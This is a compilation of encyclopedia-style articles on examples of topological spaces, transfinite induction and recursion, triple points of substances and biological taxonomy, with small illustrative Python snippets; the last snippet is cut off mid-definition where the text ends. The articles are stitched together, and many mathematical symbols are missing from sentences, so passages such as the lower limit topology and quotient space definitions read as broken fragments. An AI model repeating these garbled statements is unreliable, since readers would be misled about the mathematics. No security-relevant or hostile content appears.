Any set can be given the cofinite topology in which the open sets are the empty set and the sets whose complement is finite. This is the smallest T1 topology on any infinite set. Any set can be given the cocountable topology, in which a set is defined as open if it is either empty or its complement is countable. When the set is uncountable, this topology serves as a counterexample in many situations. The real line can also be given the lower limit topology. Here, the basic open sets are the half open intervals This topology on is strictly finer than the Euclidean topology defined above; a sequence converges to a point in this topology if and only if it converges from above in the Euclidean topology. This example shows that a set may have many distinct topologies defined on it. If is an ordinal number, then the set may be endowed with the order topology generated by the intervals and where and are elements of Every manifold has a natural topology since it is locally Euclidean. Similarly, every simplex and every simplicial complex inherits a natural topology from . The Sierpiński space is the simplest non-discrete topological space. It has important relations to the theory of computation and semantics. Topology from other topologies Every subset of a topological space can be given the subspace topology in which the open sets are the intersections of the open sets of the larger space with the subset. For any indexed family of topological spaces, the product can be given the product topology, which is generated by the inverse images of open sets of the factors under the projection mappings. For example, in finite products, a basis for the product topology consists of all products of open sets. For infinite products, there is the additional requirement that in a basic open set, all but finitely many of its projections are the entire space. A quotient space is defined as follows: if is a topological space and is a set, and if is a surjective function, then the quotient topology on is the collection of subsets of that have open inverse images under In other words, the quotient topology is the finest topology on for which is continuous. A common example of a quotient topology is when an equivalence relation is defined on the topological space The map is then the natural projection onto the set of equivalence classes. The Vietoris topology on the set of all non-empty subsets of a topological space named for Leopold Vietoris, is generated by the following basis: for every -tuple of open sets in we construct a basis set consisting of all subsets of the union of the that have non-empty intersections with each The Fell topology on the set of all non-empty closed subsets of a locally compact Polish space is a variant of the Vietoris topology, and is named after mathematician James Fell. It is generated by the following basis: for every -tuple of open sets in and for every compact set the set of all subsets of that are disjoint from and have nonempty intersections with each is a member of the basis. Metric spaces Metric spaces embody a metric, a precise notion of distance between points. Every metric space can be given a metric topology, in which the basic open sets are open balls defined by the metric. This is the standard topology on any normed vector space. On a finite-dimensional vector space this topology is the same for all norms. There are many ways of defining a topology on the set of real numbers. The standard topology on is generated by the open intervals. 
The set of all open intervals forms a base or basis for the topology, meaning that every open set is a union of some collection of sets from the base. In particular, this means that a set is open if there exists an open interval of non zero radius about every point in the set. More generally, the Euclidean spaces can be given a topology. In the usual topology on the basic open sets are the open balls. Similarly, the set of complex numbers, and have a standard topology in which the basic open sets are open balls. Topology from algebraic structure For any algebraic objects we can introduce the discrete topology, under which the algebraic operations are continuous functions. For any such structure that is not finite, we often have a natural topology compatible with the algebraic operations, in the sense that the algebraic operations are still continuous. This leads to concepts such as topological groups, topological vector spaces, topological rings and local fields. Any local field has a topology native to it, and this can be extended to vector spaces over that field. The Zariski topology is defined algebraically on the spectrum of a ring or an algebraic variety. On or the closed sets of the Zariski topology are the solution sets of systems of polynomial equations. Topological spaces with order structure Spectral: A space is spectral if and only if it is the prime spectrum of a ring (Hochster theorem). Specialization preorder: In a space the specialization preorder (or canonical preorder) is defined by if and only if where denotes an operator satisfying the Kuratowski closure axioms. Topology from other structure If is a filter on a set then is a topology on Many sets of linear operators in functional analysis are endowed with topologies that are defined by specifying when a particular sequence of functions converges to the zero function. A linear graph has a natural topology that generalizes many of the geometric aspects of graphs with vertices and edges. Outer space of a free group consists of the so-called "marked metric graph structures" of volume 1 on Classification of topological spaces Topological spaces can be broadly classified, up to homeomorphism, by their topological properties. A topological property is a property of spaces that is invariant under homeomorphisms. To prove that two spaces are not homeomorphic it is sufficient to find a topological property not shared by them. Examples of such properties include connectedness, compactness, and various separation axioms. For algebraic invariants see algebraic topology.
Mathematics
Geometry
null
30461
https://en.wikipedia.org/wiki/Transfinite%20induction
Transfinite induction
Transfinite induction is an extension of mathematical induction to well-ordered sets, for example to sets of ordinal numbers or cardinal numbers. Its correctness is a theorem of ZFC. Induction by cases Let $P(\alpha)$ be a property defined for all ordinals $\alpha$. Suppose that whenever $P(\beta)$ is true for all $\beta < \alpha$, then $P(\alpha)$ is also true. Then transfinite induction tells us that $P$ is true for all ordinals. Usually the proof is broken down into three cases: Zero case: Prove that $P(0)$ is true. Successor case: Prove that for any successor ordinal $\alpha + 1$, $P(\alpha + 1)$ follows from $P(\alpha)$ (and, if necessary, $P(\beta)$ for all $\beta < \alpha$). Limit case: Prove that for any limit ordinal $\lambda$, if $P(\beta)$ holds for all $\beta < \lambda$, then $P(\lambda)$ holds. All three cases are identical except for the type of ordinal considered. They do not formally need to be considered separately, but in practice the proofs are typically so different as to require separate presentations. Zero is sometimes considered a limit ordinal and then may sometimes be treated in proofs in the same case as limit ordinals. Transfinite recursion Transfinite recursion is similar to transfinite induction; however, instead of proving that something holds for all ordinal numbers, we construct a sequence of objects, one for each ordinal. As an example, a basis for a (possibly infinite-dimensional) vector space can be created by starting with the empty set and for each ordinal $\alpha > 0$ choosing a vector that is not in the span of the vectors $\{v_\beta \mid \beta < \alpha\}$. This process stops when no vector can be chosen. More formally, we can state the Transfinite Recursion Theorem as follows: Transfinite Recursion Theorem (version 1). Given a class function $G \colon V \to V$ (where $V$ is the class of all sets), there exists a unique transfinite sequence $F \colon \mathrm{Ord} \to V$ (where $\mathrm{Ord}$ is the class of all ordinals) such that $F(\alpha) = G(F|_\alpha)$ for all ordinals $\alpha$, where $F|_\alpha$ denotes the restriction of $F$'s domain to ordinals $< \alpha$. As in the case of induction, we may treat different types of ordinals separately: another formulation of transfinite recursion is the following: Transfinite Recursion Theorem (version 2). Given a set $g_1$, and class functions $G_2$, $G_3$, there exists a unique function $F \colon \mathrm{Ord} \to V$ such that $F(0) = g_1$; $F(\alpha + 1) = G_2(F(\alpha))$, for all $\alpha \in \mathrm{Ord}$; and $F(\lambda) = G_3(F|_\lambda)$, for all limit $\lambda \neq 0$. Note that we require the domains of $G_2$, $G_3$ to be broad enough to make the above properties meaningful. The uniqueness of the sequence satisfying these properties can be proved using transfinite induction. More generally, one can define objects by transfinite recursion on any well-founded relation $R$. ($R$ need not even be a set; it can be a proper class, provided it is a set-like relation; i.e. for any $x$, the collection of all $y$ such that $y \mathrel{R} x$ is a set.) Relationship to the axiom of choice Proofs or constructions using induction and recursion often use the axiom of choice to produce a well-ordered relation that can be treated by transfinite induction. However, if the relation in question is already well-ordered, one can often use transfinite induction without invoking the axiom of choice. For example, many results about Borel sets are proved by transfinite induction on the ordinal rank of the set; these ranks are already well-ordered, so the axiom of choice is not needed to well-order them. The following construction of the Vitali set shows one way that the axiom of choice can be used in a proof by transfinite induction: First, well-order the real numbers (this is where the axiom of choice enters via the well-ordering theorem), giving a sequence $\langle r_\alpha \mid \alpha < \beta \rangle$, where $\beta$ is an ordinal with the cardinality of the continuum. Let $v_0$ equal $r_0$.
Then let $v_1$ equal $r_{\alpha_1}$, where $\alpha_1$ is least such that $r_{\alpha_1} - v_0$ is not a rational number. Continue; at each step use the least real from the $r$ sequence that does not have a rational difference with any element thus far constructed in the $v$ sequence. Continue until all the reals in the $r$ sequence are exhausted. The final $v$ sequence will enumerate the Vitali set. The above argument uses the axiom of choice in an essential way at the very beginning, in order to well-order the reals. After that step, the axiom of choice is not used again. Other uses of the axiom of choice are more subtle. For example, a construction by transfinite recursion frequently will not specify a unique value for $A_{\alpha+1}$, given the sequence up to $\alpha$, but will specify only a condition that $A_{\alpha+1}$ must satisfy, and argue that there is at least one set satisfying this condition. If it is not possible to define a unique example of such a set at each stage, then it may be necessary to invoke (some form of) the axiom of choice to select one such at each step. For inductions and recursions of countable length, the weaker axiom of dependent choice is sufficient. Because there are models of Zermelo–Fraenkel set theory of interest to set theorists that satisfy the axiom of dependent choice but not the full axiom of choice, the knowledge that a particular proof only requires dependent choice can be useful.
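Version 1 of the recursion theorem has a finite shadow that can be sketched in code: each stage is computed from the entire dictionary of earlier stages, mirroring $F(\alpha) = G(F|_\alpha)$ for the ordinals below $\omega$. The names here are ours, purely illustrative:

```python
def recurse(G, stages: int) -> dict:
    """Build F on the finite ordinals 0..stages-1 with F(n) = G(F restricted to m < n)."""
    F = {}
    for n in range(stages):
        F[n] = G(dict(F))  # G sees exactly the earlier values, as in F(a) = G(F|a)
    return F

# Example: G returns 1 plus the sum of all earlier values, so each stage
# is determined by the whole history of stages before it.
F = recurse(lambda earlier: 1 + sum(earlier.values()), 6)
print(F)  # {0: 1, 1: 2, 2: 4, 3: 8, 4: 16, 5: 32}
```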
Mathematics
Set theory
null
30462
https://en.wikipedia.org/wiki/Triple%20point
Triple point
In thermodynamics, the triple point of a substance is the temperature and pressure at which the three phases (gas, liquid, and solid) of that substance coexist in thermodynamic equilibrium. It is that temperature and pressure at which the sublimation, fusion, and vaporisation curves meet. For example, the triple point of mercury occurs at a temperature of −38.8344 °C (234.3156 K) and a pressure of 0.165 mPa. In addition to the triple point for solid, liquid, and gas phases, a triple point may involve more than one solid phase, for substances with multiple polymorphs. Helium-4 is unusual in that it has no sublimation/deposition curve and therefore no triple points where its solid phase meets its gas phase. Instead, it has a vapor-liquid-superfluid point, a solid-liquid-superfluid point, a solid-solid-liquid point, and a solid-solid-superfluid point. None of these should be confused with the lambda point, which is not any kind of triple point. The term "triple point" was coined in 1873 by James Thomson, brother of Lord Kelvin. The triple points of several substances are used to define points in the ITS-90 international temperature scale, ranging from the triple point of hydrogen (13.8033 K) to the triple point of water (273.16 K, 0.01 °C, or 32.018 °F). Before 2019, the triple point of water was used to define the kelvin, the base unit of thermodynamic temperature in the International System of Units (SI). The kelvin was defined so that the triple point of water is exactly 273.16 K, but that changed with the 2019 revision of the SI, where the kelvin was redefined so that the Boltzmann constant is exactly 1.380649 × 10^−23 J/K, and the triple point of water became an experimentally measured constant. Triple point of water Gas–liquid–solid triple point Following the 2019 revision of the SI, the value of the triple point of water is no longer used as a defining point. However, its empirical value remains important: the unique combination of pressure and temperature at which liquid water, solid ice, and water vapor coexist in a stable equilibrium is approximately 273.16 K (0.01 °C) and a vapor pressure of 611.657 pascals (about 6.12 mbar). Liquid water can only exist at pressures equal to or greater than the triple-point pressure. Below this, as in the vacuum of outer space, solid ice sublimates, transitioning directly into water vapor when heated at a constant pressure. Conversely, above the triple point, solid ice first melts into liquid water upon heating at a constant pressure, then evaporates or boils to form vapor at a higher temperature. For most substances, the gas–liquid–solid triple point is the minimum temperature where the liquid can exist. For water, this is not the case. The melting point of ordinary ice decreases with pressure, as shown by the phase diagram's dashed green line. Just below the triple point, compression at a constant temperature transforms water vapor first to solid and then to liquid. Historically, during the Mariner 9 mission to Mars, the triple point pressure of water was used to define "sea level". Now, laser altimetry and gravitational measurements are preferred to define Martian elevation. High-pressure phases At high pressures, water has a complex phase diagram with 15 known phases of ice and several triple points, including 10 whose coordinates are shown in the diagram. For example, the triple point at 251 K (−22 °C) and 210 MPa (2070 atm) corresponds to the conditions for the coexistence of ice Ih (ordinary ice), ice III and liquid water, all at equilibrium.
There are also triple points for the coexistence of three solid phases, for example ice II, ice V and ice VI at 218 K (−55 °C) and 620 MPa (6120 atm). For those high-pressure forms of ice which can exist in equilibrium with liquid, the diagram shows that melting points increase with pressure. At temperatures above 273 K (0 °C), increasing the pressure on water vapor results first in liquid water and then a high-pressure form of ice. In the range 251–273 K, ice I is formed first, followed by liquid water and then ice III or ice V, followed by other still denser high-pressure forms. Triple-point cells Triple-point cells are used in the calibration of thermometers. For exacting work, triple-point cells are typically filled with a highly pure chemical substance such as hydrogen, argon, mercury, or water (depending on the desired temperature). The purity of these substances can be such that only one part in a million is a contaminant, called "six nines" because it is 99.9999% pure. A specific isotopic composition (for water, VSMOW) is used because variations in isotopic composition cause small changes in the triple point. Triple-point cells are so effective at achieving highly precise, reproducible temperatures that an international calibration standard for thermometers, ITS-90, relies upon triple-point cells of hydrogen, neon, oxygen, argon, mercury, and water for delineating six of its defined temperature points. Table of triple points This table lists the gas–liquid–solid triple points of several substances. Unless otherwise noted, the data come from the U.S. National Bureau of Standards (now NIST, National Institute of Standards and Technology).
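The water values quoted above make the sublimation-versus-melting distinction concrete. A toy Python classifier (the function name is ours; this is a sketch, not a substitute for the real phase diagram):

```python
# Gas-liquid-solid triple point of water (values quoted in the text above).
T_TRIPLE_K = 273.16       # kelvin, for reference
P_TRIPLE_PA = 611.657     # pascals

def heated_ice_transition(pressure_pa: float) -> str:
    """What ordinary ice does when heated at the given constant pressure."""
    if pressure_pa < P_TRIPLE_PA:
        return "sublimates directly to vapor (no liquid phase possible)"
    return "melts to liquid, then vaporizes at a higher temperature"

print(heated_ice_transition(600.0))   # below the triple point: sublimation
print(heated_ice_transition(101325))  # 1 atm: ordinary melting, then boiling
```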
Physical sciences
Phase transitions
null
30463
https://en.wikipedia.org/wiki/Taxonomy%20%28biology%29
Taxonomy (biology)
In biology, taxonomy is the scientific study of naming, defining (circumscribing) and classifying groups of biological organisms based on shared characteristics. Organisms are grouped into taxa (singular: taxon), and these groups are given a taxonomic rank; groups of a given rank can be aggregated to form a more inclusive group of higher rank, thus creating a taxonomic hierarchy. The principal ranks in modern use are domain, kingdom, phylum (division is sometimes used in botany in place of phylum), class, order, family, genus, and species. The Swedish botanist Carl Linnaeus is regarded as the founder of the current system of taxonomy, as he developed a ranked system known as Linnaean taxonomy for categorizing organisms and binomial nomenclature for naming organisms. With advances in the theory, data and analytical technology of biological systematics, the Linnaean system has transformed into a system of modern biological classification intended to reflect the evolutionary relationships among organisms, both living and extinct.

Definition

The exact definition of taxonomy varies from source to source, but the core of the discipline remains: the conception, naming, and classification of groups of organisms. As points of reference, recent definitions of taxonomy are presented below:
1. Theory and practice of grouping individuals into species, arranging species into larger groups, and giving those groups names, thus producing a classification.
2. A field of science (and a major component of systematics) that encompasses description, identification, nomenclature, and classification.
3. The science of classification, in biology the arrangement of organisms into a classification.
4. "The science of classification as applied to living organisms, including the study of means of formation of species, etc."
5. "The analysis of an organism's characteristics for the purpose of classification."
6. "Systematics studies phylogeny to provide a pattern that can be translated into the classification and names of the more inclusive field of taxonomy" (listed as a desirable but unusual definition).

The varied definitions either place taxonomy as a sub-area of systematics (definition 2), invert that relationship (definition 6), or appear to consider the two terms synonymous. There is some disagreement as to whether biological nomenclature is considered a part of taxonomy (definitions 1 and 2), or a part of systematics outside taxonomy. For example, definition 6 is paired with the following definition of systematics, which places nomenclature outside taxonomy:

Systematics: "The study of the identification, taxonomy, and nomenclature of organisms, including the classification of living things with regard to their natural relationships and the study of variation and the evolution of taxa".

In 1970, Michener et al. defined "systematic biology" and "taxonomy" (terms that are often confused and used interchangeably) in relation to one another as follows:

Systematic biology (hereafter called simply systematics) is the field that (a) provides scientific names for organisms, (b) describes them, (c) preserves collections of them, (d) provides classifications for the organisms, keys for their identification, and data on their distributions, (e) investigates their evolutionary histories, and (f) considers their environmental adaptations. This is a field with a long history that in recent years has experienced a notable renaissance, principally with respect to theoretical content.
Part of the theoretical material has to do with evolutionary areas (topics e and f above), the rest relates especially to the problem of classification. Taxonomy is that part of Systematics concerned with topics (a) to (d) above.

A whole set of terms including taxonomy, systematic biology, systematics, scientific classification, biological classification, and phylogenetics have at times had overlapping meanings – sometimes the same, sometimes slightly different, but always related and intersecting. The broadest meaning of "taxonomy" is used here. The term itself was introduced in 1813 by de Candolle, in his Théorie élémentaire de la botanique. John Lindley provided an early definition of systematics in 1830, although he wrote of "systematic botany" rather than using the term "systematics". Europeans tend to use the terms "systematics" and "biosystematics" for the study of biodiversity as a whole, whereas North Americans tend to use "taxonomy" more frequently. However, taxonomy, and in particular alpha taxonomy, is more specifically the identification, description, and naming (i.e., nomenclature) of organisms, while "classification" focuses on placing organisms within hierarchical groups that show their relationships to other organisms.

Monograph and taxonomic revision

A taxonomic revision or taxonomic review is a novel analysis of the variation patterns in a particular taxon. This analysis may be executed on the basis of any combination of the various available kinds of characters, such as morphological, anatomical, palynological, biochemical and genetic. A monograph or complete revision is a revision that is comprehensive for a taxon for the information given at a particular time, and for the entire world. Other (partial) revisions may be restricted in the sense that they may only use some of the available character sets or have a limited spatial scope. A revision results in a confirmation of, or new insights into, the relationships between the subtaxa within the taxon under study, which may lead to a change in the classification of these subtaxa, the identification of new subtaxa, or the merger of previous subtaxa.

Taxonomic characters

Taxonomic characters are the taxonomic attributes that can be used to provide the evidence from which relationships (the phylogeny) between taxa are inferred. Kinds of taxonomic characters include (a sketch of how such characters can be coded for comparison follows this list):

Morphological characters
- General external morphology
- Special structures (e.g., genitalia)
- Internal morphology (anatomy)
- Embryology
- Karyology and other cytological factors

Physiological characters
- Metabolic factors
- Body secretions
- Genic sterility factors

Molecular characters
- Immunological distance
- Electrophoretic differences
- Amino acid sequences of proteins
- DNA hybridization
- DNA and RNA sequences
- Restriction endonuclease analyses
- Other molecular differences

Behavioral characters
- Courtship and other ethological isolating mechanisms
- Other behavior patterns

Ecological characters
- Habit and habitats
- Food
- Seasonal variations
- Parasites and hosts

Geographic characters
- General biogeographic distribution patterns
- Sympatric-allopatric relationship of populations
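As an illustration of how such character lists are used in practice, the sketch below codes a few invented taxa for invented characters and counts mismatches. Real studies use far larger matrices and more sophisticated distance and inference methods; everything named here is hypothetical.

```python
# A minimal sketch of coding taxonomic characters for comparison: each
# taxon is scored for a set of discrete characters, and a simple mismatch
# count gives a crude measure of difference. Taxa, characters, and states
# are invented for illustration.
from itertools import combinations

characters = ["limb count", "blood", "reproduction"]      # hypothetical
matrix = {
    "taxon A": {"limb count": 4, "blood": "warm", "reproduction": "live birth"},
    "taxon B": {"limb count": 4, "blood": "warm", "reproduction": "eggs"},
    "taxon C": {"limb count": 0, "blood": "cold", "reproduction": "eggs"},
}

def mismatch(a: dict, b: dict) -> int:
    """Number of characters on which two taxa are scored differently."""
    return sum(a[c] != b[c] for c in characters)

for (name1, states1), (name2, states2) in combinations(matrix.items(), 2):
    print(f"{name1} vs {name2}: {mismatch(states1, states2)} differing character(s)")
```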
Alpha and beta taxonomy

The term "alpha taxonomy" is primarily used to refer to the discipline of finding, describing, and naming taxa, particularly species. In earlier literature, the term had a different meaning, referring to morphological taxonomy, and the products of research through the end of the 19th century. William Bertram Turrill introduced the term "alpha taxonomy" in a series of papers published in 1935 and 1937 in which he discussed the philosophy and possible future directions of the discipline of taxonomy.

... there is an increasing desire amongst taxonomists to consider their problems from wider viewpoints, to investigate the possibilities of closer co-operation with their cytological, ecological and genetics colleagues and to acknowledge that some revision or expansion, perhaps of a drastic nature, of their aims and methods, may be desirable ... Turrill (1935) has suggested that while accepting the older invaluable taxonomy, based on structure, and conveniently designated "alpha", it is possible to glimpse a far-distant taxonomy built upon as wide a basis of morphological and physiological facts as possible, and one in which "place is found for all observational and experimental data relating, even if indirectly, to the constitution, subdivision, origin, and behaviour of species and other taxonomic groups". Ideals can, it may be said, never be completely realized. They have, however, a great value of acting as permanent stimulants, and if we have some, even vague, ideal of an "omega" taxonomy we may progress a little way down the Greek alphabet. Some of us please ourselves by thinking we are now groping in a "beta" taxonomy.

Turrill thus explicitly excludes from alpha taxonomy various areas of study that he includes within taxonomy as a whole, such as ecology, physiology, genetics, and cytology. He further excludes phylogenetic reconstruction from alpha taxonomy. Later authors have used the term in a different sense, to mean the delimitation of species (not subspecies or taxa of other ranks), using whatever investigative techniques are available, and including sophisticated computational or laboratory techniques. Thus, Ernst Mayr in 1968 defined "beta taxonomy" as the classification of ranks higher than species.

An understanding of the biological meaning of variation and of the evolutionary origin of groups of related species is even more important for the second stage of taxonomic activity, the sorting of species into groups of relatives ("taxa") and their arrangement in a hierarchy of higher categories. This activity is what the term classification denotes; it is also referred to as "beta taxonomy".

Microtaxonomy and macrotaxonomy

How species should be defined in a particular group of organisms gives rise to practical and theoretical problems that are referred to as the species problem. The scientific work of deciding how to define species has been called microtaxonomy. By extension, macrotaxonomy is the study of groups at the higher taxonomic ranks subgenus and above, or simply in clades that include more than one taxon considered a species, expressed in terms of phylogenetic nomenclature.

History

While some descriptions of taxonomic history attempt to date taxonomy to ancient civilizations, a truly scientific attempt to classify organisms did not occur until the 18th century, with the possible exception of Aristotle, whose works hint at a taxonomy. Earlier works were primarily descriptive and focused on plants that were useful in agriculture or medicine. There are a number of stages in this scientific thinking.
Early taxonomy was based on arbitrary criteria, the so-called "artificial systems", including Linnaeus's system of sexual classification for plants (Linnaeus's 1735 classification of animals was entitled "Systema Naturae" ("the System of Nature"), implying that he, at least, believed that it was more than an "artificial system"). Later came systems based on a more complete consideration of the characteristics of taxa, referred to as "natural systems", such as those of de Jussieu (1789), de Candolle (1813) and Bentham and Hooker (1862–1863). These classifications described empirical patterns and were pre-evolutionary in thinking. The publication of Charles Darwin's On the Origin of Species (1859) led to a new explanation for classifications, based on evolutionary relationships. This was the concept of phyletic systems, from 1883 onwards. This approach was typified by those of Eichler (1883) and Engler (1886–1892). The advent of cladistic methodology in the 1970s led to classifications based on the sole criterion of monophyly, supported by the presence of synapomorphies. Since then, the evidentiary basis has been expanded with data from molecular genetics that for the most part complements traditional morphology.

Pre-Linnaean

Early taxonomists

Naming and classifying human surroundings likely began with the onset of language. Distinguishing poisonous plants from edible plants is integral to the survival of human communities. Medicinal plant illustrations appear in Egyptian wall paintings from around 1500 BC, indicating that the uses of different species were understood and that a basic taxonomy was in place.

Ancient times

Organisms were first classified by Aristotle (Greece, 384–322 BC) during his stay on the Island of Lesbos. He classified beings by their parts, or in modern terms attributes, such as having live birth, having four legs, laying eggs, having blood, or being warm-bodied. He divided all living things into two groups: plants and animals. Some of his groups of animals, such as Anhaima (animals without blood, translated as invertebrates) and Enhaima (animals with blood, roughly the vertebrates), as well as groups like the sharks and cetaceans, are still commonly used. His student Theophrastus (Greece, 370–285 BC) carried on this tradition, mentioning some 500 plants and their uses in his Historia Plantarum. Several plant genera can be traced back to Theophrastus, such as Cornus, Crocus, and Narcissus.

Medieval

Taxonomy in the Middle Ages was largely based on the Aristotelian system, with additions concerning the philosophical and existential order of creatures. This included concepts such as the great chain of being in the Western scholastic tradition, again deriving ultimately from Aristotle. The Aristotelian system did not classify plants or fungi, due to the lack of microscopes at the time, as his ideas were based on arranging the complete world in a single continuum, as per the scala naturae (the Natural Ladder). This, as well, was taken into consideration in the great chain of being. Advances were made by scholars such as Procopius, Timotheus of Gaza, Demetrios Pepagomenos, and Thomas Aquinas. Medieval thinkers used abstract philosophical and logical categorizations more suited to abstract philosophy than to pragmatic taxonomy.

Renaissance and early modern

During the Renaissance and the Age of Enlightenment, categorizing organisms became more prevalent, and taxonomic works became ambitious enough to replace the ancient texts.
This is sometimes credited to the development of sophisticated optical lenses, which allowed the morphology of organisms to be studied in much greater detail. One of the earliest authors to take advantage of this leap in technology was the Italian physician Andrea Cesalpino (1519–1603), who has been called "the first taxonomist". His magnum opus De Plantis came out in 1583, and described more than 1,500 plant species. Two large plant families that he first recognized are still in use: the Asteraceae and Brassicaceae. In the 17th century, John Ray (England, 1627–1705) wrote many important taxonomic works. Arguably his greatest accomplishment was Methodus Plantarum Nova (1682), in which he published details of over 18,000 plant species. At the time, his classifications were perhaps the most complex yet produced by any taxonomist, as he based his taxa on many combined characters. The next major taxonomic works were produced by Joseph Pitton de Tournefort (France, 1656–1708). His work from 1700, Institutiones Rei Herbariae, included more than 9,000 species in 698 genera, which directly influenced Linnaeus, as it was the text he used as a young student.

Linnaean era

The Swedish botanist Carl Linnaeus (1707–1778) ushered in a new era of taxonomy. With his major works Systema Naturae 1st Edition in 1735, Species Plantarum in 1753, and Systema Naturae 10th Edition in 1758, he revolutionized modern taxonomy. His works implemented a standardized binomial naming system for animal and plant species, which proved to be an elegant solution to a chaotic and disorganized taxonomic literature. He not only introduced the standard of class, order, genus, and species, but also made it possible to identify plants and animals from his book, by using the smaller parts of the flower (known as the Linnaean system). Plant and animal taxonomists regard Linnaeus' work as the "starting point" for valid names (at 1753 and 1758 respectively). Names published before these dates are referred to as "pre-Linnaean", and not considered valid (with the exception of spiders published in Svenska Spindlar). Even taxonomic names published by Linnaeus himself before these dates are considered pre-Linnaean.

The digital era of taxonomy

Modern taxonomy is heavily influenced by technology such as DNA sequencing, bioinformatics, databases, and imaging.

Modern system of classification

A pattern of groups nested within groups was specified by Linnaeus' classifications of plants and animals, and these patterns began to be represented as dendrograms of the animal and plant kingdoms toward the end of the 18th century, well before Charles Darwin's On the Origin of Species was published. The pattern of the "Natural System" did not entail a generating process, such as evolution, but may have implied it, inspiring early transmutationist thinkers. Among early works exploring the idea of a transmutation of species were Zoonomia in 1796 by Erasmus Darwin (Charles Darwin's grandfather), and Jean-Baptiste Lamarck's Philosophie zoologique of 1809. The idea was popularized in the Anglophone world by the speculative but widely read Vestiges of the Natural History of Creation, published anonymously by Robert Chambers in 1844.

With Darwin's theory, a general acceptance quickly appeared that a classification should reflect the Darwinian principle of common descent. Tree of life representations became popular in scientific works, with known fossil groups incorporated. One of the first modern groups tied to fossil ancestors was birds.
Using the then newly discovered fossils of Archaeopteryx and Hesperornis, Thomas Henry Huxley pronounced that they had evolved from dinosaurs, a group formally named by Richard Owen in 1842. The resulting description, that of dinosaurs "giving rise to" or being "the ancestors of" birds, is the essential hallmark of evolutionary taxonomic thinking. As more and more fossil groups were found and recognized in the late 19th and early 20th centuries, palaeontologists worked to understand the history of animals through the ages by linking together known groups. With the modern evolutionary synthesis of the early 1940s, an essentially modern understanding of the evolution of the major groups was in place. As evolutionary taxonomy is based on Linnaean taxonomic ranks, the two terms are largely interchangeable in modern use. The cladistic method has emerged since the 1960s. In 1958, Julian Huxley used the term clade. Later, in 1960, Cain and Harrison introduced the term cladistic. The salient feature is arranging taxa in a hierarchical evolutionary tree, with the desired objective of all named taxa being monophyletic. A taxon is called monophyletic if it includes all the descendants of an ancestral form. Groups that have descendant groups removed from them are termed paraphyletic, while groups representing more than one branch from the tree of life are called polyphyletic. Monophyletic groups are recognized and diagnosed on the basis of synapomorphies, shared derived character states. Cladistic classifications are compatible with traditional Linnean taxonomy and the Codes of Zoological and Botanical nomenclature, to a certain extent. An alternative system of nomenclature, the International Code of Phylogenetic Nomenclature or PhyloCode has been proposed, which regulates the formal naming of clades. Linnaean ranks are optional and have no formal standing under the PhyloCode, which is intended to coexist with the current, rank-based codes. While popularity of phylogenetic nomenclature has grown steadily in the last few decades, it remains to be seen whether a majority of systematists will eventually adopt the PhyloCode or continue using the current systems of nomenclature that have been employed (and modified, but arguably not as much as some systematists wish) for over 250 years. Kingdoms and domains Well before Linnaeus, plants and animals were considered separate Kingdoms. Linnaeus used this as the top rank, dividing the physical world into the vegetable, animal and mineral kingdoms. As advances in microscopy made the classification of microorganisms possible, the number of kingdoms increased, five- and six-kingdom systems being the most common. Domains are a relatively new grouping. First proposed in 1977, Carl Woese's three-domain system was not generally accepted until later. One main characteristic of the three-domain method is the separation of Archaea and Bacteria, previously grouped into the single kingdom Bacteria (a kingdom also sometimes called Monera), with the Eukaryota for all organisms whose cells contain a nucleus. A small number of scientists include a sixth kingdom, Archaea, but do not accept the domain method. Thomas Cavalier-Smith, who published extensively on the classification of protists, in 2002 proposed that the Neomura, the clade that groups together the Archaea and Eucarya, would have evolved from Bacteria, more precisely from Actinomycetota. 
His 2004 classification treated the archaeobacteria as part of a subkingdom of the kingdom Bacteria, i.e., he rejected the three-domain system entirely. Stefan Luketa in 2012 proposed a five "dominion" system, adding Prionobiota (acellular and without nucleic acid) and Virusobiota (acellular but with nucleic acid) to the traditional three domains.

Recent comprehensive classifications

Partial classifications exist for many individual groups of organisms and are revised and replaced as new information becomes available; however, comprehensive, published treatments of most or all life are rarer. Recent examples are that of Adl et al., 2012 and 2019, which covers eukaryotes only with an emphasis on protists, and Ruggiero et al., 2015, covering both eukaryotes and prokaryotes to the rank of Order, although both exclude fossil representatives. A separate compilation (Ruggiero, 2014) covers extant taxa to the rank of Family. Other, database-driven treatments include the Encyclopedia of Life, the Global Biodiversity Information Facility, the NCBI taxonomy database, the Interim Register of Marine and Nonmarine Genera, the Open Tree of Life, and the Catalogue of Life. The Paleobiology Database is a resource for fossils.

Application

Biological taxonomy is a sub-discipline of biology, and is generally practiced by biologists known as "taxonomists", though enthusiastic naturalists are also frequently involved in the publication of new taxa. Because taxonomy aims to describe and organize life, the work conducted by taxonomists is essential for the study of biodiversity and the resulting field of conservation biology.

Classifying organisms

Biological classification is a critical component of the taxonomic process. As a result, it informs the user as to what the relatives of the taxon are hypothesized to be. Biological classification uses taxonomic ranks, including among others (in order from most inclusive to least inclusive): domain, kingdom, phylum, class, order, family, genus, species, and strain.

Taxonomic descriptions

The "definition" of a taxon is encapsulated by its description or its diagnosis or by both combined. There are no set rules governing the definition of taxa, but the naming and publication of new taxa is governed by sets of rules. In zoology, the nomenclature for the more commonly used ranks (superfamily to subspecies) is regulated by the International Code of Zoological Nomenclature (ICZN Code). In the fields of phycology, mycology, and botany, the naming of taxa is governed by the International Code of Nomenclature for algae, fungi, and plants (ICN).

The initial description of a taxon involves five main requirements:
1. The taxon must be given a name based on the 26 letters of the Latin alphabet (a binomial for new species, or uninomial for other ranks).
2. The name must be unique (i.e. not a homonym).
3. The description must be based on at least one name-bearing type specimen.
4. It should include statements about appropriate attributes either to describe (define) the taxon or to differentiate it from other taxa (the diagnosis, ICZN Code, Article 13.1.1, ICN, Article 38, which may or may not be based on morphology). Both codes deliberately separate defining the content of a taxon (its circumscription) from defining its name.
5. These first four requirements must be published in a work that is obtainable in numerous identical copies, as a permanent scientific record.

However, often much more information is included, like the geographic range of the taxon, ecological notes, chemistry, behavior, etc. How researchers arrive at their taxa varies: depending on the available data and resources, methods vary from simple quantitative or qualitative comparisons of striking features to elaborate computer analyses of large amounts of DNA sequence data.
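The five requirements can be read as a checklist. The sketch below is an illustrative simplification, not the actual wording or full scope of either code; the field names and checks are assumptions made for the example.

```python
# An illustrative checklist for the five requirements listed above (a
# simplification, not the ICZN or ICN rules themselves).
from dataclasses import dataclass

LATIN_LETTERS = set("abcdefghijklmnopqrstuvwxyz")

@dataclass
class TaxonDescription:
    name: str                      # binomial for a species, uninomial otherwise
    existing_names: set[str]       # names already published (to catch homonyms)
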